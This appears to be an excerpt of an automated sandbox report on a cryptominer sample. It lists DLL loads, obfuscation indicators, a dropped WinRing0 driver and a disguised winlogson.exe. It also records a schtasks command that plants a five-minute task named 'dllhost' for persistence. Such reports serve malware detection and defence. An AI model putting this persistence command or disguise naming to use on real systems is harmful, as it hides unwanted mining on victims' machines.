Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: setupx 1.exe1.exe Static file information: File size 1360384 > 1048576
Source: setupx 1.exe1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr
Binary contains a suspicious time stamp
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Static PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]
PE file contains an invalid checksum
Source: winlogson.exe.10.dr Static PE information: real checksum: 0x7e7c4c should be: 0xe1f33
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x11c88
Source: setupx 1.exe1.exe Static PE information: real checksum: 0x0 should be: 0x156ac4
PE file contains sections with non-standard names
Source: winlogson.exe.10.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAC147 push ds; retf 0_2_00CAC148
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAC131 push ds; retf 0_2_00CAC136
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEDFCA push ecx; ret 0_2_00CEDFDD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00452068 push ebx; ret 2_2_00452069
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00451100 pushfd ; retn 0041h 2_2_00451101
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00451D1A push es; retn 0042h 2_2_00452065
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0045365F push esi; iretd 2_2_00453660
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAC147 push ds; retf 2_2_00CAC148
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAC131 push ds; retf 2_2_00CAC136
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CEDFCA push ecx; ret 2_2_00CEDFDD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAA775 push es; iretd 2_2_00CAA776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04E16338 pushad ; ret 13_2_04E16341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08AB7730 pushfd ; iretd 13_2_08AB7731
Source: setupx 1.exe1.exe Static PE information: section name: .text entropy: 7.09207256696417

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\WinRing0x64.sys Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\winlogson.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\winlogson.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
